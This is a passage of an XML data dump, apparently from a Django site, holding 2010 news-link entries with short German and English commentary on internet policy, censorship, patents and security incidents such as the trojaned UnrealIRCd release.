name="excerpt_html">&lt;p&gt;US gov has 1.100 data centers
&lt;/p&gt;</field><field type="CharField" name="external_url">http://arstechnica.com/business/news/2010/06/uncle-sam-looks-to-data-center-consolidation-for-savings.ars</field><field type="FileField" name="page_screenshot">page_shots/2010/06/24/does-uncle-sam-really-need-1100-data-centers.png</field><field type="SlugField" name="slug">does-uncle-sam-really-need-1100-data-centers</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-24 17:00:03</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">us</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="251" model="submitter.newsentry"><field type="CharField" name="title">Technology firms 'more trusted than traditional media' - Telegraph</field><field type="TextField" name="excerpt">According to a study by market research company Zogby International, people trust Google, Apple, and Microsoft more than the traditional media. Social networking sites such as Facebook and Twitter scored lowest on the trust scale, but still soundly beat the media. From the article: "The traditional media received little sympathy from the public, with only eight percent of all adults and six percent of young adults saying they trusted them."</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;According to a study by market research company Zogby International, people trust Google, Apple, and Microsoft more than the traditional media. Social networking sites such as Facebook and Twitter scored lowest on the trust scale, but still soundly beat the media. From the article: "The traditional media received little sympathy from the public, with only eight percent of all adults and six percent of young adults saying they trusted them."
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.telegraph.co.uk/technology/news/7847882/Technology-firms-more-trusted-than-traditional-media.html</field><field type="FileField" name="page_screenshot">page_shots/2010/06/24/technology-firms-more-trusted-than-traditional-me_.png</field><field type="SlugField" name="slug">technology-firms-more-trusted-than-traditional-me</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-24 12:17:31</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">trust</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="250" model="submitter.newsentry"><field type="CharField" name="title">Viacom vs. Internet: round one to Internet</field><field type="TextField" name="excerpt">The lawsuit has been a circus. Filings in the case reveal that Viacom paid dozens of marketing companies to clandestinely upload its videos to YouTube (sometimes "roughing them up" to make them look like pirate-chic leaks). Viacom uploaded so much of its content to YouTube that it actually lost track of which videos were "really" pirated, and which ones it had put there, and sent legal threats to Google over videos it had placed itself.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;The lawsuit has been a circus. Filings in the case reveal that Viacom paid dozens of marketing companies to clandestinely upload its videos to YouTube (sometimes "roughing them up" to make them look like pirate-chic leaks). Viacom uploaded so much of its content to YouTube that it actually lost track of which videos were "really" pirated, and which ones it had put there, and sent legal threats to Google over videos it had placed itself.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://news.yahoo.com/s/ap/20100623/ap_on_hi_te/us_tec_google_youtube_viacom</field><field type="FileField" name="page_screenshot">page_shots/2010/06/24/viacom-vs-internet-round-one-to-internet_.png</field><field type="SlugField" name="slug">viacom-vs-internet-round-one-to-internet</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-24 12:12:58</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">file sharing, google, imaginary property, piracy, viacom, youtube</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="249" model="submitter.newsentry"><field type="CharField" name="title">Australian Government To Force Internet Users To Install State-Approved Software | NewWORLDLiberty</field><field type="TextField" name="excerpt">The Australian government is set to intensify its war against Internet freedom by forcing web users to install state-approved anti-virus software. If they fail to do so, they will be denied an Internet connection, or if their computer is later infected, the users connection will be terminated.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;The Australian government is set to intensify its war against Internet freedom by forcing web users to install state-approved anti-virus software. If they fail to do so, they will be denied an Internet connection, or if their computer is later infected, the users connection will be terminated.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.newworldliberty.com/newsarticle/australian-government-force-internet-users-install-state-approved-software</field><field type="FileField" name="page_screenshot">page_shots/2010/06/22/australian-government-to-force-internet-users-to-i.png</field><field type="SlugField" name="slug">australian-government-to-force-internet-users-to-i</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-22 15:49:41</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string">australia censorship</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="7"></object></field></object><object pk="248" model="submitter.newsentry"><field type="CharField" name="title">heise online - Bürgerrechtler wollen gegen Volkszählung 2011 klagen</field><field type="TextField" name="excerpt">Unbedingt publik machen! Auf [zensus11.de](http://zensus11.de/) hinweisen.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Unbedingt publik machen! Auf &lt;a href="http://zensus11.de/"&gt;zensus11.de&lt;/a&gt; hinweisen.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Buergerrechtler-wollen-gegen-Volkszaehlung-2011-klagen-1026704.html</field><field type="FileField" name="page_screenshot">page_shots/2010/06/22/heise-online-burgerrechtler-wollen-gegen-volksza.png</field><field type="SlugField" name="slug">heise-online-burgerrechtler-wollen-gegen-volksza</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-22 11:48:46</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string">zensus</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="247" model="submitter.newsentry"><field type="CharField" name="title">heise online - &amp;quot;Das Glück, dass meiner zuerst lief&amp;quot; Zum 100. Geburtstag von Konrad Zuse</field><field type="TextField" name="excerpt">Der Vollständigkeit halber: Vor 100 Jahren wurde Konrad Zuse geboren, der den ersten Computer der Welt gebaut hat (12. Mai 1941).</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Der Vollständigkeit halber: Vor 100 Jahren wurde Konrad Zuse geboren, der den ersten Computer der Welt gebaut hat (12. Mai 1941).
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Das-Glueck-dass-meiner-zuerst-lief-Zum-100-Geburtstag-von-Konrad-Zuse-1026082.html</field><field type="FileField" name="page_screenshot">page_shots/2010/06/22/heise-online-quotdas-gluck-dass-meiner-zuerst_.png</field><field type="SlugField" name="slug">heise-online-quotdas-gluck-dass-meiner-zuerst</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-22 11:05:42</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string">computer zuse</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="6"></object></field></object><object pk="246" model="submitter.newsentry"><field type="CharField" name="title">Twitter on a ZX Spectrum • The Register</field><field type="TextField" name="excerpt">Wird wohl kaum einer verstehen, aber echt eine [Leistung](http://www.youtube.com/watch?v=-ECnN7jdgA4 "YouTube")</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Wird wohl kaum einer verstehen, aber echt eine &lt;a href="http://www.youtube.com/watch?v=-ECnN7jdgA4" title="YouTube"&gt;Leistung&lt;/a&gt;
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.theregister.co.uk/2010/06/21/vintage_computer_fair/</field><field type="FileField" name="page_screenshot">page_shots/2010/06/21/twitter-on-a-zx-spectrum-the-register.png</field><field type="SlugField" name="slug">twitter-on-a-zx-spectrum-the-register</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-21 23:00:49</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string">twitter zx_spectrum</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="5"></object></field></object><object pk="245" model="submitter.newsentry"><field type="CharField" name="title">Technik-Streit - iPad-Nutzung im Bundestag sorgt für Ärger - Politik - Berliner Morgenpost</field><field type="TextField" name="excerpt">Only in .de: FDP-Redner im Bundestag liest sein Geplapper vom iPad ab und das ist aber wie alle Computer im Bundestag verboten. Was machen die denn da mit Smartphones?</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Only in .de: FDP-Redner im Bundestag liest sein Geplapper vom iPad ab und das ist aber wie alle Computer im Bundestag verboten. Was machen die denn da mit Smartphones?
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.morgenpost.de/politik/article1329805/iPad-Nutzung-im-Bundestag-sorgt-fuer-Aerger.html</field><field type="FileField" name="page_screenshot">page_shots/2010/06/21/technik-streit-ipad-nutzung-im-bundestag-sorgt-f.png</field><field type="SlugField" name="slug">technik-streit-ipad-nutzung-im-bundestag-sorgt-f</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-21 22:47:20</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string">bundestag ipad</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="7"></object></field></object><object pk="244" model="submitter.newsentry"><field type="CharField" name="title">Amazon has officially patented the "Social Networking System"</field><field type="TextField" name="excerpt">As incredible as it sounds, the United States Patent and Trademark Office actually awarded Amazon a patent for the "Social Networking System." To make it truly ridiculous, the abstract on the patent reads as though it were succinctly describing Facebook.
Take a look for yourself; here's the abstract from the top of the patent.
&gt; A networked computer system provides various services for assisting users in locating, and establishing contact relationships with, other users. For example, in one embodiment, users can identify other users based on their affiliations with particular schools or other organizations. The system also provides a mechanism for a user to selectively establish contact relationships or connections with other users, and to grant permissions for such other users to view ersonal information of the user. The system may also include features for enabling users to identify contacts of their respective contacts. In addition, the system may automatically notify users of personal information updates made by their respective contacts.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;As incredible as it sounds, the United States Patent and Trademark Office actually awarded Amazon a patent for the "Social Networking System." To make it truly ridiculous, the abstract on the patent reads as though it were succinctly describing Facebook.
&lt;/p&gt;
&lt;p&gt;Take a look for yourself; here's the abstract from the top of the patent.
&lt;/p&gt;
&lt;blockquote&gt;&lt;p&gt;A networked computer system provides various services for assisting users in locating, and establishing contact relationships with, other users. For example, in one embodiment, users can identify other users based on their affiliations with particular schools or other organizations. The system also provides a mechanism for a user to selectively establish contact relationships or connections with other users, and to grant permissions for such other users to view ersonal information of the user. The system may also include features for enabling users to identify contacts of their respective contacts. In addition, the system may automatically notify users of personal information updates made by their respective contacts.
&lt;/p&gt;
&lt;/blockquote&gt;</field><field type="CharField" name="external_url">http://www.downloadsquad.com/2010/06/17/amazon-patents-social-networking-system/</field><field type="FileField" name="page_screenshot">page_shots/2010/06/21/amazon-has-officially-patented-the-social-network.png</field><field type="SlugField" name="slug">amazon-has-officially-patented-the-social-network</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-21 10:28:11</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string">amazon facebook patent</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="1"></object></field></object><object pk="243" model="submitter.newsentry"><field type="CharField" name="title">Schadcode bei ilse-aigner.de? - Qbi's Weblog</field><field type="TextField" name="excerpt">OMFG! Unsere Verbraucherschutzministerin verteilt Malware... Das ist die Tante, die jetzt bei facebook ausgetreten ist und immer Google flamed.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;OMFG! Unsere Verbraucherschutzministerin verteilt Malware... Das ist die Tante, die jetzt bei facebook ausgetreten ist und immer Google flamed.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.kubieziel.de/blog/archives/1370-Schadcode-bei-ilse-aigner.de.html</field><field type="FileField" name="page_screenshot">page_shots/2010/06/18/no_page_shot.png</field><field type="SlugField" name="slug">schadcode-bei-ilse-aignerde-qbis-weblog</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-18 22:36:42</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string">aigner</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="242" model="submitter.newsentry"><field type="CharField" name="title">New Bill Would Let Obama Police Internet for National Security Reasons - The Daily Beast </field><field type="TextField" name="excerpt">A new bill rocketing through Congress would give the president sweeping powers to police the Web for national-security reasons. Could this be a way to block WikiLeaks?</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;A new bill rocketing through Congress would give the president sweeping powers to police the Web for national-security reasons. Could this be a way to block WikiLeaks?
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.thedailybeast.com/blogs-and-stories/2010-06-18/new-bill-would-let-obama-police-internet-for-national-security-reasons/</field><field type="FileField" name="page_screenshot">page_shots/2010/06/18/new-bill-would-let-obama-police-internet-for-natio.png</field><field type="SlugField" name="slug">new-bill-would-let-obama-police-internet-for-natio</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-18 16:16:16</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string">censorship</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="241" model="submitter.newsentry"><field type="CharField" name="title">MS betreibt Babyklappe für Daten</field><field type="TextField" name="excerpt">Da kann man gefundene Daten abgeben.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Da kann man gefundene Daten abgeben.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Microsoft-kuendigt-Meldestelle-fuer-gestohlene-Zugangsdaten-an-1025150.html</field><field type="FileField" name="page_screenshot">page_shots/2010/06/18/ms-betreibt-babyklappe-fur-daten.png</field><field type="SlugField" name="slug">ms-betreibt-babyklappe-fur-daten</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-18 13:08:47</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string">dataloss fraud microsoft</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="240" model="submitter.newsentry"><field type="CharField" name="title">HTTPS Everywhere: Firefox plugin that switches on crypto whenever it's available</field><field type="TextField" name="excerpt">The Electronic Frontier Foundation and The Onion Router (TOR) project have teamed up to release a new privacy-enhancing Firefox plugin called HTTPS Everywhere. It was inspired by Google's new encrypted search engine, and it ensures that whenever you visit a site that accepts encrypted connections, your browser switches into encrypted mode, hiding your traffic from snoops on your local network and at your ISP. HTTPS Everywhere covers Google search, Wikipedia, Twitter, Identi.ca, Facebook, EFF, Tor, Scroogle, DuckDuckGo, Ixquick and other smaller search engines. It's still in beta (what isn't?) but I've been running it all morning with no negative side effects. </field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;The Electronic Frontier Foundation and The Onion Router (TOR) project have teamed up to release a new privacy-enhancing Firefox plugin called HTTPS Everywhere. It was inspired by Google's new encrypted search engine, and it ensures that whenever you visit a site that accepts encrypted connections, your browser switches into encrypted mode, hiding your traffic from snoops on your local network and at your ISP. HTTPS Everywhere covers Google search, Wikipedia, Twitter, Identi.ca, Facebook, EFF, Tor, Scroogle, DuckDuckGo, Ixquick and other smaller search engines. It's still in beta (what isn't?) but I've been running it all morning with no negative side effects.
&lt;/p&gt;</field><field type="CharField" name="external_url">https://www.eff.org/deeplinks/2010/06/encrypt-web-https-everywhere-firefox-extension</field><field type="FileField" name="page_screenshot">page_shots/2010/06/18/https-everywhere-firefox-plugin-that-switches-on.png</field><field type="SlugField" name="slug">https-everywhere-firefox-plugin-that-switches-on</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-18 13:01:07</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string">crypto eff firefox openssl plugin tor</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="2"></object></field></object><object pk="239" model="submitter.newsentry"><field type="CharField" name="title"> Verleger: Leistungsschutzrecht soll Sprache monopolisieren : netzpolitik.org</field><field type="TextField" name="excerpt">Die sterbenden Zeitungsverleger versuchen nun die Sprache zu "patentieren".
Um einen effektiven Rechtsschutz zu gewährleisten, sollten nicht nur Teile des Presseerzeugnisses wie einzelne Beiträge, Vorspänne, Bilder und Grafiken geschützt werden. Schutzwürdig sind beispielsweise auch Überschriften, Sätze, Satzteile etc., soweit sie einer systematischen Vervielfältigung, Verbreitung oder öffentlichen Wiedergabe in Verbindung mit dem Titel des Presseerzeugnisses dienen.
*Tolle Wurst*</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Die sterbenden Zeitungsverleger versuchen nun die Sprache zu "patentieren".
&lt;/p&gt;
&lt;p&gt;Um einen effektiven Rechtsschutz zu gewährleisten, sollten nicht nur Teile des Presseerzeugnisses wie einzelne Beiträge, Vorspänne, Bilder und Grafiken geschützt werden. Schutzwürdig sind beispielsweise auch Überschriften, Sätze, Satzteile etc., soweit sie einer systematischen Vervielfältigung, Verbreitung oder öffentlichen Wiedergabe in Verbindung mit dem Titel des Presseerzeugnisses dienen.
&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Tolle Wurst&lt;/em&gt;
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.netzpolitik.org/2010/verleger-leistungsschutzrecht-soll-sprache-monopolisieren/</field><field type="FileField" name="page_screenshot">page_shots/2010/06/18/verleger-leistungsschutzrecht-soll-sprache-mono.png</field><field type="SlugField" name="slug">verleger-leistungsschutzrecht-soll-sprache-mono</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-18 11:18:18</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string">leistungsschutzrecht patent verleger</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object><object pk="7"></object></field></object><object pk="238" model="submitter.newsentry"><field type="CharField" name="title">Printer für Internetausdrucker</field><field type="TextField" name="excerpt">Prints scheduled content from the Web. Unsere Regierung ist gerettet. Jetzt auch mit Werbung!</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Prints scheduled content from the Web. Unsere Regierung ist gerettet. Jetzt auch mit Werbung!
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.computerworld.com/s/article/9178128/HP_partners_with_Yahoo_for_targeted_ads</field><field type="FileField" name="page_screenshot">page_shots/2010/06/17/unknown-title_.png</field><field type="SlugField" name="slug">unknown-title</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-17 10:33:10</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string">ads hp internetausdrucker print</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="237" model="submitter.newsentry"><field type="CharField" name="title">BBC News - Armed police at Merseyside school after FBI warning</field><field type="TextField" name="excerpt">How to DOS a shool? Put up a facebook page w/ a pic of a gun and drop the letters: *tomorrow - last day of school*. The FBI takes care of the rest</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;How to DOS a shool? Put up a facebook page w/ a pic of a gun and drop the letters: &lt;em&gt;tomorrow - last day of school&lt;/em&gt;. The FBI takes care of the rest
&lt;/p&gt;</field><field type="CharField" name="external_url">http://news.bbc.co.uk/2/hi/uk_news/england/merseyside/10319053.stm</field><field type="FileField" name="page_screenshot">page_shots/2010/06/16/bbc-news-armed-police-at-merseyside-school-after.png</field><field type="SlugField" name="slug">bbc-news-armed-police-at-merseyside-school-after</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-16 10:19:51</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string">facebook fbi</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="236" model="submitter.newsentry"><field type="CharField" name="title">Google to Commies: Well make censorship illegal • The Register</field><field type="TextField" name="excerpt">Google is working with the US government to try to make it illegal for countries to censor the Internet by using international trade rules.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Google is working with the US government to try to make it illegal for countries to censor the Internet by using international trade rules.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.theregister.co.uk/2010/06/14/googleon_vietnam/</field><field type="FileField" name="page_screenshot">page_shots/2010/06/15/google-to-commies-well-make-censorship-illegal.png</field><field type="SlugField" name="slug">google-to-commies-well-make-censorship-illegal</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-15 23:28:32</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string">censorship google</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="235" model="submitter.newsentry"><field type="CharField" name="title">Federal Bureau of Investigation &amp;ndash; Featured Fugitives - Cyber Crimes</field><field type="TextField" name="excerpt">Dead or alive.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Dead or alive.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.fbi.gov/wanted/fugitives/cyber/fug_cyber.htm</field><field type="FileField" name="page_screenshot">page_shots/2010/06/15/federal-bureau-of-investigation-ndash-featured-f.png</field><field type="SlugField" name="slug">federal-bureau-of-investigation-ndash-featured-f</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-15 23:27:44</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string">crime</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="234" model="submitter.newsentry"><field type="CharField" name="title">Nmap Development: Always practice safe software: a lesson from UnrealIRCd</field><field type="TextField" name="excerpt">Die UnrealIRCd Backdoor wäre mit signierten Paketen vermeidbar gewesen.
The UnrealIRCd team just made an interesting vulnerability announcement:
http://seclists.org/fulldisclosure/2010/Jun/277
It seems that the Unreal has been trojaned since last November on at
least some of its official mirror sites. The backdoor is very simple
and allows anyone to run arbitrary system commands pre-auth. I've
already seen one group hit by this.
Interestingly, the Unreal team had apparently stopped GPG/PGP signing
releases because they didn't think it was worth the trouble given how
few people were verifying the signatures. Oops! They are now
planning to re-implement that feature.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Die UnrealIRCd Backdoor wäre mit signierten Paketen vermeidbar gewesen.
&lt;/p&gt;
&lt;p&gt;The UnrealIRCd team just made an interesting vulnerability announcement:
&lt;/p&gt;
&lt;p&gt;http://seclists.org/fulldisclosure/2010/Jun/277
&lt;/p&gt;
&lt;p&gt;It seems that the Unreal has been trojaned since last November on at
least some of its official mirror sites. The backdoor is very simple
and allows anyone to run arbitrary system commands pre-auth. I've
already seen one group hit by this.
&lt;/p&gt;
&lt;p&gt;Interestingly, the Unreal team had apparently stopped GPG/PGP signing
releases because they didn't think it was worth the trouble given how
few people were verifying the signatures. Oops! They are now
planning to re-implement that feature.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://seclists.org/nmap-dev/2010/q2/826</field><field type="FileField" name="page_screenshot">page_shots/2010/06/13/nmap-development-always-practice-safe-software-a.png</field><field type="SlugField" name="slug">nmap-development-always-practice-safe-software-a</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-13 18:57:07</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string">backdoor signing</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="9"></object></field></object><object pk="233" model="submitter.newsentry"><field type="CharField" name="title">US-Gesetzesinitiative: Obamas Notfall-Ausschalter fürs Internet - SPIEGEL ONLINE - Nachrichten - Netzwelt</field><field type="TextField" name="excerpt">Bereits zum dritten Mal in dieser Legislaturperiode liegt dem US-Senat mit dem " Protecting Cyberspace as a National Asset Act" (PCNAA) ein Gesetzentwurf vor, der Barack Obama - und den US-Sicherheitsbehörden - weitreichende Kontrolle über Amerikas Netz- und Telekommunikationsinfrastruktur geben soll.
Dem Präsidenten wird darin die Möglichkeit gegeben, eine Art Cyber-Notstand zu erklären.
* Netzwerk-TÜV
* Privatunternehmen sollen an staatl. IDS teilnehmen.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Bereits zum dritten Mal in dieser Legislaturperiode liegt dem US-Senat mit dem " Protecting Cyberspace as a National Asset Act" (PCNAA) ein Gesetzentwurf vor, der Barack Obama - und den US-Sicherheitsbehörden - weitreichende Kontrolle über Amerikas Netz- und Telekommunikationsinfrastruktur geben soll.
Dem Präsidenten wird darin die Möglichkeit gegeben, eine Art Cyber-Notstand zu erklären.
&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
Netzwerk-TÜV
&lt;/li&gt;
&lt;li&gt;
Privatunternehmen sollen an staatl. IDS teilnehmen.
&lt;/li&gt;
&lt;/ul&gt;</field><field type="CharField" name="external_url">http://www.spiegel.de/netzwelt/netzpolitik/0,1518,700136,00.html</field><field type="FileField" name="page_screenshot">page_shots/2010/06/12/us-gesetzesinitiative-obamas-notfall-ausschalter.png</field><field type="SlugField" name="slug">us-gesetzesinitiative-obamas-notfall-ausschalter</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-12 22:14:47</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string">pcnaa</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="232" model="submitter.newsentry"><field type="CharField" name="title">Ministerpräsidenten unterzeichnen den Jugendmedienschutz-Staatsvertrag</field><field type="TextField" name="excerpt">Die Ministerpräsidenten der Länder haben gestern ihre Unterschrift unter den neuen Jugendmedienschutz-Staatsvertrag (JMStV) gesetzt, mit dem eine Altersbeschränkung für Webseiten eingeführt werden soll. Bürgerrechtler bezweifeln die Freiwilligkeit der Kontrolle und warnen vor dem Einstieg in die (Selbst-) Zensur.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" 